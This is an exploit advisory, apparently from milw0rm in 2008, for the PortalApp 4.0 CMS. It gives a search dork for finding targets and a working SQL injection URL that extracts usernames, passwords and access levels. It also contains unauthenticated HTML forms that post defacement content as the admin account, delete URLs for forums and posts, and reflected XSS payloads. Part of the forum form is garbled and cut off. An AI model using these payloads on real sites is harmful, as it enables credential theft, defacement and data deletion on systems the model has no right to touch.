############################################################################## #Title: PortalApp 4.0 Multiple vulnerabilities # # # #Discovered By: r3dm0v3 # # http://r3dm0v3.persianblog.ir # # r3dm0v3( 4t }yahoo[dot}com # # Tehran - Iran # # # #Vendor: http://www.portalapp.com # #Vulnerable Version: 4.0, prior versions maybe vulnerable # #Remote Exploit: Yes # #Dork: "Copyright @2007 Iatek LLC" # #Fix: Not Available # ############################################################################## ############################################################################## # SQL Injection (CRITICAL) # ############################################################################## #Description: PortalApp is a Content Management System (CMS) for websites. Bug: The user input 'sortby' is directly used in query statement! #Exploit: http://site.com/forums.asp?keywords=r3dm0v3&do_search=1&sortby=users.user_name+UNION+SELECT+1,2,3,4,5,password,user_name,8,9,10,user_id,accesslevel,13,14,15+FROM+Users author will be usernames topic will be passwords replies will be username IDs views will be access levels (5 is super admin) ############################################################################## # Following actions in 'forum.asp' can take done without any authentication. # ############################################################################## create a forum: create a topic:

userid:by default 255 is sa
ForumID:
Subject:
Message:

r3dm0v3 was here.</textarea><br>
 Icon:<input type=text name=Icon value=14><br>
 Show Signature:<input type=text name=Showsignature value=0><br>
 Notify:<input type=text name=Notify ><br>
 Locked:<input type=text name=Locked value=1><br>
 Sticky:<input type=text name=Sticky ><br>
 Date:<input type=text name=DateAdded value="6/1/2008"><br>
 DateLast:<input type=text name=DateLast value="6/1/2008"><br>
 <input type=submit>
</form>
</html>

delete a forum: http://site.com/forums.asp?action=delete_level1_edit_disc_forums&ForumId=[ForumID]
delete a topic: http://site.com/forums.asp?action=delete_level2_edit_disc_topics&TopicId=[TopicID]
delete a reply: http://site.com/forums.asp?action=delete_level3_edit_disc_replies&ReplyId=[ReplyID]
delete a topic reply: http://site.com/forums.asp?action=delete_level2_disc_replies&TopicId=[TopicID]&ReplyId=[ReplyID]

#There some other actions:
insert_level3_edit_disc_replies
insert_detail_disc_topics
update_level1_edit_disc_forums
update_level2_edit_disc_topics
update_level3_edit_disc_replies
update_detail_disc_topics
update_level2_disc_replies

##############################################################################
#Following actions in 'Content.asp' can take done without any authentication.#
##############################################################################
Add content:
<html>
<form action=http://site.com/content.asp?action=insert_detail_default method=post>
 userid:<input type=text name=user_id value=255>by default 255 is sa<br>
 ContentTypeID:<input type=text name=ContentTypeID value=2>1:general(company) 2:article 3:lin 4:news 5:announcement 6:download 7:gallery 8:faq ...<br>
 catID:<input type=text name=CatID value=198><br>
 Date:<input type=text name=DateAdded value="6/1/2008"><br>
 Author:<input type=text name=Author value=r3dm0v3><br>
 title:<input type=text name=Title value="h4ck3d bY r3dm0v3"><br>
 ShortDesc:<br><textarea rows=3 cols=50 name=ShortDesc>r3dm0v3 was here.</textarea><br>
 LongDesc:<br><textarea rows=4 cols=50  name=LongDesc>r3dm0v3 was here. http://r3dm0v3.persianblog.ir</textarea><br>
 relatedULR<input type=text name=RelatedURL value="http://r3dm0v3.persianblog.ir"><br>
 DownloadURL:<input type=text name=DownloadURL><br>
 Filename:<input type=text name=Filename><br>
 Thumbnail:<input type=text name=Thumbnail><br>
 Image1:<input type=text name=Image1><br>
 PrevContentID:<input type=text name=PrevContentId><br>
 NextContentID:<input type=text name=NextContentId><br>
 views:<input type=text name=Impressions value=10000><br>
 AVGRating:<input type=text name=AvgRating value=10000><br>
 <input type=submit>
</form>
</html>

'insert_detail_content' is also vulnerable. Use above html code for exploit

##############################################################################
#                                   XSS                                      #
##############################################################################
http://site.com/forums.asp?keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1
http://site.com/content.asp?ContentType=General&keywords=%27%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&do_search=1

# milw0rm.com [2008-01-06]